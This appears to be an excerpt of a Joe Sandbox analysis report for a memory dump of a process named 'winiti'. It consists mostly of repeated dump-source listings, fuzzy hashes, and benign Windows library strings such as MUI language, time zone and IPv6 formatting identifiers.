                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                              Function 00D7FD5C Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                              Function 00D7FED0 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                              Function 00D7FEA0 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                              Function 00D7FE24 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                              Function 00D7FFFC Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                              Function 00D7FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                              Function 00D7FF34 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                              Function 00DA8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Kernel-MUI-Language-Disallowed, xrefs: 00DA8914
                              • Kernel-MUI-Language-SKU, xrefs: 00DA89FC
                              • Kernel-MUI-Language-Allowed, xrefs: 00DA8827
                              • WindowsExcludedProcs, xrefs: 00DA87C1
                              • Kernel-MUI-Number-Allowed, xrefs: 00DA87E6
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: _wcspbrk
                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                              • API String ID: 402402107-258546922
                              • Opcode ID: c3aba144580847aac2bd8b7e6475ba55bd14ed92f61ef3a1e370f8c82a2469aa
                              • Instruction ID: 845b7ed4ceff140446f940e9061fbf70d615dc1f32db8452f5d1013a2dc19e49
                              • Opcode Fuzzy Hash: c3aba144580847aac2bd8b7e6475ba55bd14ed92f61ef3a1e370f8c82a2469aa
                              • Instruction Fuzzy Hash: 22F1C4B6D00249EFCF11EF95C9819EEBBB8FB09300F15446AE905A7211EB359A45EF70
                              Function 00E1822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: _wcsnlen
                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                              • API String ID: 3628947076-1387797911
                              • Opcode ID: 545e24fce2bee934efbdcdd2ded04494bd1bec9bfeb4b0b6cfd0134c837cbd97
                              • Instruction ID: d87f033eb29d44478ae4cf6afa3d6f31576f1d79b63a69e01a830fc23bd1f04c
                              • Opcode Fuzzy Hash: 545e24fce2bee934efbdcdd2ded04494bd1bec9bfeb4b0b6cfd0134c837cbd97
                              • Instruction Fuzzy Hash: 2D41A372341208BEEB119AA0CE42FDE77ECEF05B44F145112BA14F6191EBB0DB9497B4
                              Function 00DC13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: cef5f72f7b37ca96bd5fd4acf3ebb21833fd9b08ce4ad07b715b2fc6ac2b4d18
                              • Instruction ID: aa4654ccd42cf91c7ecc0f37cf716294d9bf3e9b98d33939b6ca59daf82d99f7
                              • Opcode Fuzzy Hash: cef5f72f7b37ca96bd5fd4acf3ebb21833fd9b08ce4ad07b715b2fc6ac2b4d18
                              • Instruction Fuzzy Hash: 9C614A759046A6AACB38DF59C890CBEBBF5EF95300718C12DF4D647642D734AA40CB70
                              Function 00E23B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: 7def4b37fa2bb42300b7b31450b6f7152e411ee41c7c3ffc26f59e5831f76081
                              • Instruction ID: 7130bb4550edf2011704b93674e92ed4ce96837662268b73a63f713852cd8ac8
                              • Opcode Fuzzy Hash: 7def4b37fa2bb42300b7b31450b6f7152e411ee41c7c3ffc26f59e5831f76081
                              • Instruction Fuzzy Hash: 8861C472900668AFCB20DF69D8424BEBBF5EF54314B14D52AF8A9B7141E238DB40DF60
                              Function 00DB7EFD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                              Download Yara Rule
                              APIs
                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00DD3F12
                              Strings
                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DD3F75
                              • ExecuteOptions, xrefs: 00DD3F04
                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00DDE345
                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DD3EC4
                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DD3F4A
                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DDE2FB
                              • 'y, xrefs: 00DB7F1E
                              • Execute=1, xrefs: 00DD3F5E
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: BaseDataModuleQuery
                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'y
                              • API String ID: 3901378454-3824360031
                              • Opcode ID: a00d2ea1273008fc8891f418c021b58fae262b545dd42696b4c1eba8d255bec0
                              • Instruction ID: a5c96cdba6f2824d62ce3c9b970a5936bd0359b21094716db9d6a8ee3ddda57c
                              • Opcode Fuzzy Hash: a00d2ea1273008fc8891f418c021b58fae262b545dd42696b4c1eba8d255bec0
                              • Instruction Fuzzy Hash: DE418671A4021CBBDF20AA94DC8AFFA73BCEF58700F0405A9F505A6191EA709A498B75
                              Function 00DC0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: __fassign
                              • String ID: .$:$:
                              • API String ID: 3965848254-2308638275
                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                              • Instruction ID: ce6655ebc8c27a0617d6a3f9d73287ee238fbdd1af6fa06d7efe68489324ba14
                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                              • Instruction Fuzzy Hash: 94A17C7190034BEBCB24DFA4C945BAEBBB5EF05304F28856ED852A7282D6349A41DB71
                              Function 00DC0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                              Download Yara Rule
                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE2206
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 885266447-4236105082
                              • Opcode ID: e47997e00fa6f58e4747c7460bdad628d1d39e0b08854d69d928488206b16e79
                              • Instruction ID: ab1ab9f34664151ed7a316884863dbb242333843664fbd224f738c390a0a7157
                              • Opcode Fuzzy Hash: e47997e00fa6f58e4747c7460bdad628d1d39e0b08854d69d928488206b16e79
                              • Instruction Fuzzy Hash: C55149717002526FEB24AB19CC82F6633ADEF94710F25826DFD44DB285EA71ED418BB4
                              Function 00DC14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                              Download Yara Rule
                              APIs
                              • ___swprintf_l.LIBCMT ref: 00DEEA22
                                • Part of subcall function 00DC13CB: ___swprintf_l.LIBCMT ref: 00DC146B
                                • Part of subcall function 00DC13CB: ___swprintf_l.LIBCMT ref: 00DC1490
                              • ___swprintf_l.LIBCMT ref: 00DC156D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$]:%u
                              • API String ID: 48624451-3050659472
                              • Opcode ID: 7f82d860d29227952c28336c88bd22222883899dc64dac1793214913eb0cdc39
                              • Instruction ID: 21ec3082f775b49c0eeebd95caf8d427e50f22013cda40a606be5b4140ba5160
                              • Opcode Fuzzy Hash: 7f82d860d29227952c28336c88bd22222883899dc64dac1793214913eb0cdc39
                              • Instruction Fuzzy Hash: EB21847691022A9BCB21EE54CC41FEE73BCEB91710F584159F846D3242DB70DA588BF1
                              Function 00E23DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
